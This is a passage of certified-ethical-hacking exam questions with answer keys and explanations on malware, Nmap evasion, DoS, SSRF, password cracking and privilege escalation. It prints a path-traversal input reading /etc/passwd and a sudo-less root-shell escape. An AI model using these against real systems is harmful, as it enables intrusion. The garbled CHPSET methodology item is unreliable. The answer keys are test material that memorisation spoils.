Option A is wrong because the command uses '-v2c', not '-v1', so SNMPv1 is not being used. Option B is wrong because it incorrectly specifies SNMPv1 and the community string 'private', which is typically used for read-write access, not the 'public' string shown in the command. Option D is wrong because SNMPv3 does not use community strings; it uses usernames and authentication/encryption parameters, and the command does not include any SNMPv3-specific flags like '-u' or '-l'.
During a forensic investigation, an analyst finds a suspicious file that changes its code signature each time it replicates. The file uses encryption and polymorphism to evade signature-based detection. Which type of virus is this?
A.Macro virus
B.File infector virus
C.Boot sector virus
D.Polymorphic virus
AnswerD
Polymorphic viruses are a sophisticated type of malware designed to evade signature-based detection by constantly changing their executable code while retaining their original functionality. They achieve this through a 'mutation engine' that encrypts the virus body with a different key and decryption routine for each new infection. This process ensures that every new instance of the virus has a unique signature, making it extremely challenging for traditional antivirus software to identify based on static patterns.
Why this answer
D is correct because a polymorphic virus is specifically designed to change its code signature each time it replicates, using encryption and mutation engines to evade signature-based detection. The description of altering the signature with each replication while maintaining the same core functionality is the defining characteristic of a polymorphic virus.
Exam trap
CEH often tests the distinction between a polymorphic virus and a metamorphic virus; the trap here is that candidates may confuse 'polymorphic' (which changes the decryption routine but keeps the body encrypted) with 'metamorphic' (which rewrites its entire code without encryption), but the question explicitly mentions encryption, confirming polymorphism.
How to eliminate wrong answers
Option A is wrong because a macro virus infects documents or spreadsheets by embedding malicious macros in scripting languages like VBA, and while it can replicate, it does not inherently change its code signature through encryption and polymorphism. Option B is wrong because a file infector virus attaches itself to executable files and activates when the host program runs, but it typically does not alter its signature with each replication unless it incorporates polymorphic techniques, which is not its defining feature. Option C is wrong because a boot sector virus infects the master boot record or boot sector of a storage device, loading before the OS, and it does not routinely change its code signature via encryption and polymorphism as a primary evasion method.
A security analyst runs `nmap -sS -sV -A 192.168.1.100` and obtains open ports and service versions. However, the analyst suspects the target is behind an IDS/IPS. Which Nmap technique would BEST evade detection while still performing a similar scan?
A.Add -f to fragment IP packets
B.Use -sT instead of -sS to perform a full TCP connect scan
C.Increase timing to -T5 for a faster scan
D.Replace -sV with -sU to scan UDP services
AnswerA
Adding -f to fragment IP packets instructs Nmap to split the TCP header across multiple smaller IP packets. This technique, known as IP fragmentation, can bypass stateless firewalls and basic Intrusion Detection Systems (IDS) or Intrusion Prevention Systems (IPS) that are not configured to reassemble fragmented packets before inspection. By scattering the critical header information, it becomes more challenging for signature-based detection mechanisms to identify the scan pattern, thus aiding in evasion.
Why this answer
Using the `-f` flag fragments the IP packets, splitting the TCP header across multiple packets. This helps evade simple IDS/IPS signatures that rely on detecting a complete SYN scan in a single packet, as the fragmented packets may bypass pattern-matching rules or reassembly buffers.
Exam trap
EC-Council often tests the misconception that faster scans (`-T5`) are stealthier, when in reality they increase noise and detection risk, while fragmentation (`-f`) is a recognized evasion technique for bypassing packet inspection.
How to eliminate wrong answers
Option B is wrong because `-sT` performs a full TCP connect scan, which completes the three-way handshake and is more likely to be logged by the target system and detected by IDS/IPS due to the completed connections. Option C is wrong because increasing timing to `-T5` sends packets faster, which can actually increase the likelihood of detection by IDS/IPS due to abnormal traffic patterns or rate-based alerts. Option D is wrong because replacing `-sV` with `-sU` changes the scan type to UDP, which does not perform the same service version detection and is not a technique for evading detection; it simply scans different protocols.
A security analyst is reviewing a vulnerability scan report for a web server that hosts an e-commerce application. The report lists a finding: 'SSL Certificate Expired' with a severity of High. The analyst confirms the certificate expired yesterday. Which of the following is the MOST appropriate immediate action?
A.Disable HTTPS and revert to HTTP until a new certificate is purchased.
B.Renew the SSL certificate and deploy it to the web server.
C.Ignore the finding because the certificate is only one day expired and still encrypts traffic.
D.Add the expired certificate to the trusted root store on all client machines.
AnswerB
An expired certificate causes browser warnings and breaks trust, potentially disrupting customer transactions. Renewing and deploying a valid certificate restores secure HTTPS communication and resolves the immediate availability and trust issue. This is the direct remediation for the finding and aligns with standard certificate lifecycle management.
Why this answer
An expired SSL certificate breaks the chain of trust, causing browser warnings and potential transaction failures. Renewing and deploying a valid certificate is the correct immediate remediation. It restores secure HTTPS and ensures customers can transact without errors, addressing both security and availability concerns.
Exam trap
The trap here is thinking that because the certificate still encrypts traffic, it is not urgent, when expiration actually breaks trust and usability.
Which TWO of the following are characteristics of a DNS amplification attack? (Select 2)
Select 2 answers
A.It targets the victim's MAC address
B.It uses spoofed source IP addresses
C.It exploits open DNS resolvers
D.It requires the attacker to be on the same subnet as the victim
E.It uses ICMP echo requests
AnswersB, C
This is a critical characteristic of DNS amplification. The attacker sends small DNS queries to numerous open DNS resolvers, but crafts these queries to appear as if they originated from the victim's IP address. This IP spoofing ensures that when the resolvers send their much larger responses, they are directed to the legitimate victim's network, effectively overwhelming their bandwidth and causing a denial of service. Without spoofing, the responses would return to the attacker, nullifying the amplification effect.
Why this answer
DNS amplification attacks rely on sending DNS queries with a spoofed source IP address that matches the victim's IP. The attacker sends small queries to open DNS resolvers, which then send large responses to the victim, overwhelming their bandwidth. This spoofing ensures the amplified traffic is directed at the victim, not the attacker.
Exam trap
The trap here is that candidates often confuse DNS amplification with other reflection attacks like Smurf (which uses ICMP) or think the attacker must be local, but the key differentiator is the use of spoofed source IPs and open DNS resolvers over UDP.
Which type of malware is characterized by self-replication and spreading across networks without needing a host file?
A.Trojan
B.Worm
C.Ransomware
D.Virus
AnswerB
A worm is a standalone malicious program designed to self-replicate and propagate across computer networks without requiring a host program or user intervention. Worms exploit vulnerabilities in operating systems or applications to spread autonomously, often scanning for vulnerable systems and then infecting them to continue their replication cycle. This independent self-replication and network-based propagation are their defining characteristics, allowing them to consume network bandwidth and system resources rapidly.
Why this answer
A worm is a standalone malware program that replicates itself to spread to other computers over a network, exploiting vulnerabilities or using social engineering, without requiring a host file or user intervention. Unlike viruses, worms do not need to attach to an existing program; they operate independently, often using network protocols like SMB, HTTP, or email to propagate.
Exam trap
EC-CEH often tests the distinction between a virus and a worm by emphasizing that a virus requires a host file to attach to, while a worm is self-contained and spreads independently over networks, leading candidates to mistakenly choose 'Virus' when they see 'self-replication' without noting the 'no host file' condition.
How to eliminate wrong answers
Option A is wrong because a Trojan disguises itself as legitimate software but does not self-replicate; it relies on user execution and lacks autonomous network propagation. Option C is wrong because ransomware encrypts files or locks systems for ransom but does not self-replicate or spread across networks without user action; its primary behavior is extortion, not autonomous replication. Option D is wrong because a virus requires a host file (e.g., an executable or document) to attach to and replicate, and it typically spreads via file sharing or removable media, not autonomously across networks without a host.
An attacker attempts to exploit a web application by sending a request that triggers the server to make an internal HTTP request to a sensitive internal service. Which type of attack is this?
A.CSRF
B.XXE
C.SSRF
D.IDOR
AnswerC
Server-Side Request Forgery (SSRF) occurs when a web application is tricked into making requests to an arbitrary domain specified by an attacker. This vulnerability allows an attacker to induce the server-side application to make HTTP requests to an attacker-specified location, potentially targeting internal networks, cloud metadata services, or other external systems. The server acts as a proxy for the attacker, bypassing network segmentation or firewall rules that might otherwise block direct access.
Why this answer
SSRF (Server-Side Request Forgery) occurs when an attacker can induce the server to make requests to internal resources.
During a reconnaissance phase, a penetration tester uses Shodan to search for devices with a specific open port. Which of the following BEST describes what Shodan provides beyond a simple port scan?
A.Real-time network traffic analysis
B.Passive DNS records and domain registration details
C.Banner information and service metadata from internet-connected devices
D.Historical vulnerability data for each device
AnswerC
Shodan's core functionality involves actively scanning the internet to identify open ports and then performing banner grabbing to collect detailed information from exposed services. This includes service banners (e.g., HTTP server versions, SSH daemon versions), operating system details, geographic location, and other configuration metadata. This rich metadata allows penetration testers to quickly identify potential vulnerabilities, misconfigurations, and the specific technologies running on internet-facing assets, forming a critical part of the reconnaissance phase.
Why this answer
Shodan is a search engine for internet-connected devices that actively probes IP addresses and collects banner information—the metadata that services (e.g., HTTP, SSH, FTP) return upon connection. This includes server headers, version strings, default credentials, and other service fingerprints, which goes far beyond a simple port scan that only reports whether a port is open or closed.
Exam trap
The trap here is that candidates confuse Shodan's banner-grabbing capability with a vulnerability scanner, assuming it provides historical CVE data, when in fact Shodan only shows the current service fingerprint and does not automatically map it to vulnerabilities.
How to eliminate wrong answers
Option A is wrong because Shodan does not perform real-time network traffic analysis; it uses periodic, active probing to collect static snapshots of service banners, not live packet captures or flow data. Option B is wrong because passive DNS records and domain registration details are the domain of tools like whois, SecurityTrails, or DNSdumpster, not Shodan—Shodan focuses on IP-level service metadata, not domain-level ownership or DNS history. Option D is wrong because Shodan does not provide historical vulnerability data for each device; while it may show the version of a service, it does not correlate that version with CVE databases or track patch history—that would require a separate vulnerability scanner or a platform like Shodan's own 'Vulnerabilities' feature (which is an add-on, not a core capability).
Which TWO of the following tools are capable of cracking password hashes offline? (Select 2)
Select 2 answers
A.Hashcat
B.Hydra
C.John the Ripper
D.Nmap
E.Wireshark
AnswersA, C
Hashcat is an advanced offline password recovery utility renowned for its unparalleled speed, primarily achieved through extensive GPU acceleration. It supports a vast array of hash types, including NTLM, MD5, SHA-1, and bcrypt, and offers diverse attack modes such as dictionary, brute-force, mask, and hybrid attacks. This makes it exceptionally effective for cracking password hashes extracted from compromised systems or databases, enabling rapid auditing of password security.
Why this answer
Hashcat is a high-performance password recovery tool that supports offline cracking of password hashes using GPU acceleration. It can process a wide range of hash types (e.g., MD5, SHA-1, bcrypt, NTLM) by comparing precomputed or brute-force generated hashes against a target hash file, all without interacting with a live authentication server.
Exam trap
The trap here is that candidates often confuse online brute-forcing tools (like Hydra) with offline hash crackers, because both are used for password attacks, but Hydra requires a live target service and cannot process a static hash file.
Which THREE of the following are common indicators of a buffer overflow vulnerability?
Select 3 answers
A.Unexpected program crashes or segmentation faults
B.Access violation errors when writing to memory
C.Use of return-oriented programming (ROP)
D.High CPU usage
E.Overwritten adjacent memory regions
AnswersA, B, E
A buffer overflow writes data beyond the intended buffer's boundaries, corrupting adjacent memory. This corruption can overwrite critical program data, function pointers, or the stack frame itself. When the program attempts to access or execute corrupted instructions or data, it leads to an illegal memory access, triggering a segmentation fault or an unexpected program termination.
Why this answer
A is correct because buffer overflow vulnerabilities often cause unexpected program crashes or segmentation faults. When a program writes data beyond the allocated buffer size, it can corrupt the stack or heap, leading to invalid memory access that the operating system detects and terminates with a segmentation fault (SIGSEGV). This is a classic symptom of overwritten return addresses or other critical control data.
Exam trap
The trap here is that candidates confuse exploitation techniques (like ROP) with vulnerability indicators, but ROP is a post-exploitation method, not a sign that a buffer overflow exists.
A network administrator notices a large number of SYN packets from various spoofed source IP addresses targeting a web server. The server's connection table is full, and legitimate users cannot connect. Which type of attack is this?
A.Ping flood
B.Smurf attack
C.UDP flood
D.SYN flood
AnswerD
A SYN flood is a type of DoS attack where an attacker sends a succession of SYN requests with spoofed source IPs to a target. The server allocates resources for each half-open connection, eventually exhausting its connection table and denying service to legitimate users. This matches the scenario perfectly.
Why this answer
The attack uses spoofed SYN packets to exhaust the server's connection table, preventing legitimate connections. This is a SYN flood, a common TCP-based denial-of-service attack. The other options describe different flood attacks using ICMP or UDP.
Exam trap
The trap here is confusing SYN flood with other flood attacks; the key is the use of SYN packets and the exhaustion of the connection table, which is specific to TCP SYN floods.
Which THREE of the following are common techniques used during the footprinting phase? (Choose three.)
Select 3 answers
A.Exploitation
B.Port scanning
C.WHOIS lookup
D.Google hacking
E.DNS zone transfer
AnswersC, D, E
A WHOIS lookup is a fundamental footprinting technique that queries public databases to retrieve registration details for domain names and IP addresses. This process reveals critical information such as the domain owner's name, organization, contact email, physical address, registration and expiration dates, and associated DNS name servers. Such data is invaluable for identifying potential targets, understanding organizational structure, and mapping network infrastructure during the initial reconnaissance phase.
Why this answer
WHOIS lookup is a footprinting technique that queries domain registration databases (e.g., whois.arin.net) to obtain registrant contact details, name servers, and registration dates. Google hacking (also known as Google dorking) uses advanced search operators to uncover sensitive information indexed by search engines, such as exposed configuration files or login pages. DNS zone transfer (AXFR) is a footprinting technique that, if misconfigured, allows an attacker to retrieve a complete list of DNS records for a domain, revealing internal hostnames and network structure.
All three are passive or semi-passive information-gathering methods performed without directly engaging the target's systems.
Exam trap
EC-Council often tests the distinction between footprinting (passive, non-intrusive) and scanning (active, intrusive), so candidates mistakenly classify port scanning or exploitation as footprinting techniques.
Which of the following tools is specifically used to enumerate SMB shares and retrieve file listings from Windows systems?
A.ldapsearch
B.snmpwalk
C.smbclient
D.nmap
AnswerC
smbclient is a powerful command-line utility that acts as an SMB/CIFS client, similar to a Windows file explorer. It is specifically designed to interact with SMB servers, allowing users to list available shares on a target machine using the "-L" option, connect to specific shares, and browse, upload, or download files. Its direct capability to query and display network shares makes it the most appropriate tool for SMB enumeration.
Why this answer
smbclient is a tool from the Samba suite specifically designed to interact with SMB/CIFS shares. It allows an attacker to enumerate available shares on a Windows target and retrieve file listings by connecting to the SMB service (port 445 or 139) using commands like 'smbclient -L //target' or by mounting a share and listing its contents.
Exam trap
The trap here is that candidates often confuse nmap's ability to detect SMB services with the actual enumeration of shares and file listings, but nmap requires specific NSE scripts and does not provide the direct interactive file listing capability that smbclient offers.
How to eliminate wrong answers
Option A is wrong because ldapsearch is a tool for querying LDAP directory services (port 389/636), not for enumerating SMB shares or retrieving file listings from Windows systems. Option B is wrong because snmpwalk is used to retrieve SNMP MIB data (port 161/162) from network devices, not to interact with SMB shares. Option D is wrong because nmap is a port scanner and network mapper that can detect open SMB ports but cannot natively enumerate SMB shares or retrieve file listings without additional scripts (e.g., smb-enum-shares), and even then it is not the dedicated tool for direct file listing.
A security team suspects a session hijacking attack. The analyst examines network traffic and sees packets with sequence numbers that increment by predictable values. Which attack is MOST likely occurring?
A.TCP sequence prediction
B.ARP poisoning
C.DNS spoofing
D.MAC flooding
AnswerA
TCP sequence prediction involves an attacker guessing the next valid sequence number in a TCP connection. If the sequence numbers are predictable, the attacker can inject crafted packets into an established session, effectively hijacking it. By successfully predicting and sending packets with the correct sequence and acknowledgment numbers, the attacker can impersonate one of the legitimate communication parties, taking control of the session without needing to intercept initial authentication. This allows for unauthorized command execution or data manipulation within the active session.
Why this answer
TCP sequence prediction attacks exploit the ability to guess the next sequence number in a TCP connection, allowing an attacker to inject forged packets and hijack the session. The analyst observed packets with sequence numbers incrementing by predictable values, which is the hallmark of weak or static sequence number generation in older TCP implementations.
Exam trap
The trap here is that candidates confuse session hijacking with ARP poisoning or DNS spoofing, but the key clue is 'predictable sequence numbers,' which directly points to TCP sequence prediction, not Layer 2 or DNS manipulation.
How to eliminate wrong answers
Option B (ARP poisoning) is wrong because it involves manipulating ARP tables to intercept traffic at Layer 2, not predicting TCP sequence numbers. Option C (DNS spoofing) is wrong because it corrupts DNS responses to redirect traffic, not targeting TCP sequence numbers. Option D (MAC flooding) is wrong because it overwhelms a switch's CAM table to force it into hub mode, enabling packet sniffing, not sequence number prediction.
During a social engineering assessment, an attacker calls a help desk impersonating a new employee and requests a password reset due to a 'locked account'. The help desk complies. Which social engineering technique is being used?
A.Phishing
B.Vishing
C.Pretexting
D.Quid pro quo
AnswerC
Pretexting is a sophisticated form of social engineering where an attacker invents a believable, fabricated scenario (a "pretext") to manipulate a target into divulging information or performing an action. This often involves extensive research to create a credible backstory, a false identity, and a plausible reason for the interaction, making the target believe they are interacting with someone authorized or legitimate. The scenario's description of an attacker calling and using a fabricated scenario directly aligns with the definition of pretexting.
Why this answer
Pretexting is the correct answer because the attacker fabricates a scenario (the pretext of being a new employee with a locked account) to manipulate the help desk into performing a password reset. This technique relies on a crafted story to gain trust and bypass security procedures, rather than using technical exploits or direct requests for information.
Exam trap
The trap here is that candidates confuse the medium (phone call) with the technique, incorrectly selecting vishing (Option B) instead of recognizing that the core deception is the fabricated pretext, not the voice channel itself.
How to eliminate wrong answers
Option A is wrong because phishing typically involves sending fraudulent emails or messages that mimic legitimate entities to trick victims into revealing sensitive information or clicking malicious links, not a direct phone call impersonation. Option B is wrong because vishing (voice phishing) uses phone calls to extract sensitive data like credit card numbers or credentials, but the core technique here is the fabricated identity and story, not the medium alone. Option D is wrong because quid pro quo involves offering a service or benefit in exchange for information or access (e.g., 'I'll fix your computer if you give me your password'), whereas this scenario uses a false identity to request a routine action without any reciprocal offer.
Which of the following tools is specifically designed to automate the process of detecting and exploiting SQL injection vulnerabilities in web applications?
A.Burp Suite
B.Metasploit
C.SQLMap
D.Nmap
AnswerC
SQLMap automates detection and exploitation of SQL injection in web applications, fingerprinting the backend DBMS and dumping data via crafted payloads. This directly matches the stem's requirement for a tool specifically built to automate SQL injection detection and exploitation, rather than general web scanners.
Why this answer
SQLMap is an open-source penetration testing tool that automates the detection and exploitation of SQL injection flaws. It supports a wide range of database backends and injection techniques, making it the go-to tool for this specific task.
Exam trap
EC-Council often tests the distinction between general-purpose security tools (like Burp Suite or Metasploit) and specialized automation tools (like SQLMap), leading candidates to choose a tool they recognize for web testing rather than the one specifically designed for SQL injection automation.
How to eliminate wrong answers
Option A is wrong because Burp Suite is an intercepting proxy and web application security testing platform that requires manual configuration or extensions to automate SQL injection exploitation; it is not purpose-built for automated SQL injection detection and exploitation. Option B is wrong because Metasploit is a framework for developing and executing exploit code against remote targets, but it does not natively automate the detection and exploitation of SQL injection vulnerabilities in web applications without additional modules or manual scripting. Option D is wrong because Nmap is a network scanning tool used for host discovery, port scanning, and service enumeration, and it lacks any capability to detect or exploit SQL injection vulnerabilities.
A penetration tester performs a container escape by exploiting a misconfigured capability and mounts the host filesystem. Which cloud service model is MOST directly affected?
A.Platform as a Service (PaaS)
B.Software as a Service (SaaS)
C.Function as a Service (FaaS)
D.Infrastructure as a Service (IaaS)
AnswerD
Infrastructure as a Service (IaaS) provides virtualized computing resources, such as virtual machines, networks, and storage, granting users significant control over the operating system and installed software. In an IaaS model, users frequently deploy and manage their own containerized applications, often having direct access to the container runtime and the host operating system. This elevated level of control means a successful container escape directly compromises the host VM or underlying physical server, rendering IaaS the most susceptible cloud service model for such an attack.
Why this answer
Container escape compromises the host, affecting the underlying infrastructure in IaaS. In PaaS/SaaS, the provider may manage containers differently.
Which THREE Nmap options are commonly used to evade firewall detection during a scan? (Choose three.)
Select 3 answers
A.-f (fragment packets)
B.-T0 (paranoid timing)
C.-D (decoy)
D.-sT (TCP connect scan)
E.-sV (version detection)
AnswersA, B, C
The -f option instructs Nmap to fragment the IP packets into smaller, non-standard-sized pieces. This technique can bypass stateless firewalls or Intrusion Detection Systems (IDS) that only inspect the initial fragments, as critical header information (like TCP flags or port numbers) might be split across multiple segments. When the fragmented packets reach the target, the operating system reassembles them before processing, potentially allowing the scan to proceed undetected by intermediate network devices.
Why this answer
The -f flag fragments the IP packets into smaller pieces (typically 8-byte fragments) to bypass simple packet-filtering firewalls and intrusion detection systems that do not reassemble fragmented packets before applying filtering rules. This technique exploits the fact that many stateless firewalls only inspect the first fragment and allow subsequent fragments through unchecked, enabling the scan to reach the target.
Exam trap
The trap here is that candidates often mistake -sT (TCP connect scan) as a stealthy option because it is the default scan type, but it actually completes the full handshake and is highly detectable, whereas the correct evasion options focus on fragmentation, timing, and decoys.
Which password cracking method uses a precomputed table of hash chains to reverse password hashes quickly?
A.Hybrid attack
B.Rainbow table attack
C.Dictionary attack
D.Brute-force attack
AnswerB
A rainbow table attack utilizes a precomputed table of hash chains to reverse cryptographic hash functions efficiently. Instead of brute-forcing each hash, the attacker looks up the target hash within the table, which maps hashes back to their original plaintext passwords. This method exploits a time-memory tradeoff, allowing for rapid password recovery without needing to compute every possible password combination during the attack.
Why this answer
A rainbow table attack is correct because it uses precomputed tables of hash chains to reverse password hashes quickly. Instead of computing the hash for every possible password in real time, the attacker looks up the hash in the table to find the corresponding plaintext, drastically reducing the time needed for cracking.
Exam trap
The trap here is that candidates confuse rainbow tables with dictionary attacks, thinking both use precomputed lists, but rainbow tables specifically use hash chains to cover many passwords efficiently, not a simple list of words.
How to eliminate wrong answers
Option A is wrong because a hybrid attack combines dictionary words with variations (e.g., appending numbers or symbols) but does not use precomputed hash chains. Option C is wrong because a dictionary attack tries a list of likely passwords by hashing each one and comparing, without any precomputed table. Option D is wrong because a brute-force attack tries every possible character combination sequentially, computing hashes on the fly, which is computationally expensive and does not rely on precomputed tables.
An organization deploys a fleet of IoT cameras that communicate with a central server over the internet. The cameras use HTTP to send video streams. What is the most critical security improvement to protect the video data in transit?
A.Require strong passwords on the camera web interface.
B.Use a site-to-site VPN between the cameras and the server.
C.Use certificate pinning to prevent man-in-the-middle attacks.
D.Implement TLS/SSL encryption for all camera communications.
AnswerD
Implementing TLS/SSL (Transport Layer Security/Secure Sockets Layer) encryption for all camera communications establishes a robust, end-to-end secure channel. This protocol encrypts the entire data stream, including sensitive video feeds, audio, control commands, and metadata, protecting them from unauthorized interception, eavesdropping, and tampering as they traverse public or untrusted networks. TLS/SSL also provides server authentication, ensuring the camera communicates with the legitimate server, and data integrity verification, confirming the data has not been altered in transit.
Why this answer
The most critical security improvement is to implement TLS/SSL encryption (HTTPS) for all camera communications. HTTP transmits video data in plaintext, allowing any attacker on the network path to capture and view the video stream. TLS/SSL provides encryption, integrity, and authentication, directly protecting the confidentiality of the video data in transit.
Exam trap
EC-Council often tests the distinction between authentication/access controls (passwords, certificate pinning) and encryption (TLS/SSL), leading candidates to choose a security measure that does not actually protect data in transit.
How to eliminate wrong answers
Option A is wrong because strong passwords protect only the authentication to the camera's web interface, not the video data itself during transmission; an attacker can still intercept unencrypted HTTP streams. Option B is wrong because a site-to-site VPN would encrypt traffic between two network gateways, but if the cameras connect directly over the internet without a VPN client, the traffic remains unencrypted; VPNs also add complexity and latency not required for this specific threat. Option C is wrong because certificate pinning is a defense against man-in-the-middle attacks that validates a specific certificate, but it does not encrypt the data; without TLS/SSL, the video stream is still sent in plaintext and can be intercepted regardless of pinning.
A security analyst wants to perform passive reconnaissance on a target organization without generating any traffic to the target's network. Which of the following techniques would be MOST appropriate?
A.Running Nmap SYN scan
B.Executing hping3 to probe ports
C.Using Netcat to connect to a service
D.Performing a WHOIS lookup
AnswerD
Performing a WHOIS lookup involves querying publicly available domain registration databases, such as those maintained by ICANN-accredited registrars. This process retrieves information like domain ownership, administrative contacts, technical contacts, and registration dates without sending any packets directly to the target's servers or network infrastructure. Since the interaction is solely with third-party public records, it is a quintessential passive reconnaissance technique, leaving no trace on the target system itself.
Why this answer
WHOIS lookup is a passive reconnaissance technique that queries public databases (e.g., whois.arin.net) for domain registration details without sending any packets to the target's network. It relies on external, publicly available data, thus generating zero traffic to the target organization's infrastructure.
Exam trap
The trap here is that candidates confuse active scanning tools (Nmap, hping3, Netcat) with passive information gathering, failing to recognize that any direct packet transmission to the target constitutes active reconnaissance.
How to eliminate wrong answers
Option A is wrong because Nmap SYN scan sends crafted TCP SYN packets directly to the target's IP addresses, generating detectable network traffic. Option B is wrong because hping3 actively sends custom packets (e.g., TCP, UDP, ICMP) to probe ports and services, which creates traffic to the target. Option C is wrong because Netcat establishes a TCP or UDP connection to a target service, actively interacting with the target's network and generating traffic.
A penetration tester performs a container escape from a Docker container running in a cloud environment. Which of the following is the MOST likely cause?
A.The container uses default credentials for SSH
B.The container image has a known vulnerability in the MQTT library
C.The host OS is running an outdated kernel version
D.The container is running with the --privileged flag
AnswerD
Running a container with the `--privileged` flag effectively disables most of the security features and isolation mechanisms provided by the container runtime. This flag grants the container nearly all capabilities of the host, including direct access to host devices (e.g., `/dev`), the ability to mount host filesystems, and full control over the kernel's capabilities (like `CAP_SYS_ADMIN`). These elevated privileges provide direct and straightforward vectors for a penetration tester to break out of the container and gain control over the host system.
Why this answer
Container escape often occurs when the container is run with the --privileged flag, granting elevated capabilities that allow access to the host kernel.
During a penetration test, you identify a parameter in a web application that appears to fetch a file from the server. You modify the parameter to '../../../etc/passwd' and see the contents of the passwd file. Which type of vulnerability is this?
A.Remote File Inclusion (RFI)
B.Directory traversal
C.Server-Side Request Forgery (SSRF)
D.Local File Inclusion (LFI)
AnswerB
Directory traversal, also known as path traversal, is a vulnerability that allows an attacker to access files and directories stored outside the intended root directory by manipulating file paths. This is typically achieved by injecting sequences like `../` (dot-dot-slash) into input parameters, enabling navigation upwards in the directory hierarchy to read sensitive system files or application configuration.
Why this answer
The use of '../' sequences to traverse directories and access files outside the web root is classic directory traversal.
Which THREE of the following are valid defenses against CSRF attacks? (Select 3)
Select 3 answers
A.Custom request headers (e.g., X-Requested-With)
B.SameSite cookies set to Lax or Strict
C.CSRF tokens
D.Input validation
E.Output encoding
AnswersA, B, C
Custom request headers like X-Requested-With serve as an effective CSRF defense by leveraging browser security mechanisms. Modern browsers, adhering to the Same-Origin Policy and CORS specifications, prevent attackers from arbitrarily adding or modifying such custom headers in simple cross-origin requests. The server can then validate the presence and expected value of this header, rejecting any request originating from an unauthorized domain that lacks the legitimate header. This ensures that only requests from the legitimate origin, which can set the header, are processed.
Why this answer
CSRF tokens, SameSite cookies (Lax or Strict), and custom headers (e.g., X-Requested-With with XMLHttpRequest) are all effective CSRF defenses.
During a penetration test, a tester gains access to a Linux system and needs to escalate privileges. The tester finds that the user has sudo privileges to run /usr/bin/less as root without a password. Which technique should the tester use to escalate privileges?
A.Exploit a kernel vulnerability using a local exploit
B.Run /usr/bin/less with sudo, then type !/bin/bash to spawn a root shell
C.Use the find command with -exec to execute a shell
D.Check for world-writable scripts in cron jobs
AnswerB
This method correctly leverages a common sudo misconfiguration where a user is permitted to execute /usr/bin/less with root privileges. Inside less, typing '!' allows the execution of arbitrary shell commands. Since less is running as root via sudo, any command executed through '!', such as !/bin/bash, will also inherit root privileges, effectively spawning a root shell.
Why this answer
When a user has sudo privileges to run /usr/bin/less as root without a password, the tester can leverage the fact that less can execute shell commands from within its interface. By running 'sudo /usr/bin/less' and then typing '!/bin/bash', the tester spawns a root shell, effectively escalating privileges to root.
Exam trap
The trap here is that candidates may overlook the command execution capability of less and instead focus on kernel exploits or cron jobs, missing the direct and simplest path to root via the sudo misconfiguration.
How to eliminate wrong answers
Option A is wrong because exploiting a kernel vulnerability is unnecessary when a simpler, authorized sudo misconfiguration exists; this option distracts from the direct privilege escalation path. Option C is wrong because the find command with -exec is a technique for executing commands on files, but it does not inherently provide privilege escalation unless combined with a setuid binary or specific permissions, and the user does not have sudo rights to find. Option D is wrong because checking for world-writable scripts in cron jobs is a valid enumeration step but is not the immediate technique to exploit the given sudo privilege; it is a slower, indirect method that may not yield root access.
A security engineer is configuring DDoS protection for a web server. The goal is to mitigate a Slowloris attack. Which mitigation technique is MOST effective?
A.Use anycast routing
B.Implement rate limiting and connection timeout
C.Increase the maximum number of simultaneous connections
D.Enable SYN cookies
AnswerB
Slowloris attacks aim to exhaust server resources by maintaining numerous open, incomplete HTTP connections. Implementing a strict connection timeout for idle or slow-sending connections will effectively terminate these malicious sessions before they can consume all available server sockets indefinitely. Additionally, rate limiting the number of new connections or requests from a single source IP can prevent an attacker from establishing a sufficient volume of connections to overwhelm the server's capacity, thus mitigating the attack.
Why this answer
Slowloris works by opening many HTTP connections and keeping them alive by sending partial requests, never completing them, which exhausts the server's connection pool. Rate limiting restricts the number of connections from a single IP, and connection timeouts force idle connections to close, directly countering Slowloris's behavior. This combination prevents the attacker from holding connections open indefinitely.
Exam trap
The trap here is that candidates confuse Slowloris with a SYN flood and choose SYN cookies (Option D), but Slowloris operates at the application layer after the TCP handshake completes, so SYN cookies are ineffective.
How to eliminate wrong answers
Option A is wrong because anycast routing distributes traffic across multiple data centers, which helps with volumetric DDoS attacks but does not prevent a single low-bandwidth connection from exhausting server resources, as Slowloris does. Option C is wrong because increasing the maximum number of simultaneous connections only gives the attacker more room to open additional connections, making the attack worse. Option D is wrong because SYN cookies protect against SYN flood attacks by deferring resource allocation until the handshake completes, but Slowloris completes the TCP handshake and then sends partial HTTP requests, so SYN cookies do not mitigate it.
Which phase of the system hacking methodology (CHPSET) involves hiding files from the operating system using techniques such as rootkits or steganography?
A.Cracking passwords
B.Erasing tracks
C.Executing applications
D.Hiding files
AnswerD
Hiding files is a core activity within the "Maintaining Access" phase of system hacking, specifically represented by the 'H' in the CHIPSET acronym. This involves employing various techniques, such as rootkits, steganography, or manipulating file attributes and permissions, to conceal malicious tools, backdoors, or data staging areas from legitimate users, administrators, and security software, thereby ensuring persistence and operational secrecy on the compromised system.
Why this answer
The 'Hiding files' phase of the CHPSET (Cracking passwords, Hacking, Privilege escalation, Spying, Erasing tracks, Executing applications, Hiding files) methodology involves concealing malicious files from the operating system and security tools. Techniques such as rootkits (which hook system calls like NtQueryDirectoryFile to hide files from directory listings) and steganography (embedding data within innocent files like images or audio) are used to avoid detection. This phase directly follows 'Executing applications' and ensures the attacker's payload remains persistent and covert.
Exam trap
The trap here is that candidates confuse 'Erasing tracks' (clearing logs) with 'Hiding files' (concealing the files themselves), but the CEH CHPSET model separates these as distinct phases—'Hiding files' specifically refers to techniques like rootkits and steganography that hide the file from the OS, not just removing evidence of its execution.
How to eliminate wrong answers
Option A is wrong because 'Cracking passwords' is the initial phase of CHPSET, focused on gaining access through password attacks (e.g., brute force, rainbow tables), not hiding files. Option B is wrong because 'Erasing tracks' involves clearing logs (e.g., clearing Event Logs or using tools like `wevtutil`) to cover the attacker's footprint, not hiding files from the OS. Option C is wrong because 'Executing applications' refers to running the malicious payload (e.g., backdoor or keylogger) after privilege escalation, not the act of concealing files.
Which asymmetric encryption algorithm is based on the algebraic structure of elliptic curves over finite fields and provides equivalent security to RSA with smaller key sizes?
A.SHA-256
B.Diffie-Hellman (DH)
C.Triple DES (3DES)
D.Elliptic Curve Cryptography (ECC)
AnswerD
Elliptic Curve Cryptography (ECC) is an asymmetric encryption algorithm that derives its security from the mathematical properties of elliptic curves over finite fields, specifically the difficulty of the Elliptic Curve Discrete Logarithm Problem (ECDLP). It provides a robust framework for public-key cryptography, including encryption, digital signatures, and key exchange. ECC is highly efficient, offering equivalent security to RSA with significantly smaller key sizes, making it particularly well-suited for resource-constrained environments like mobile devices.
Why this answer
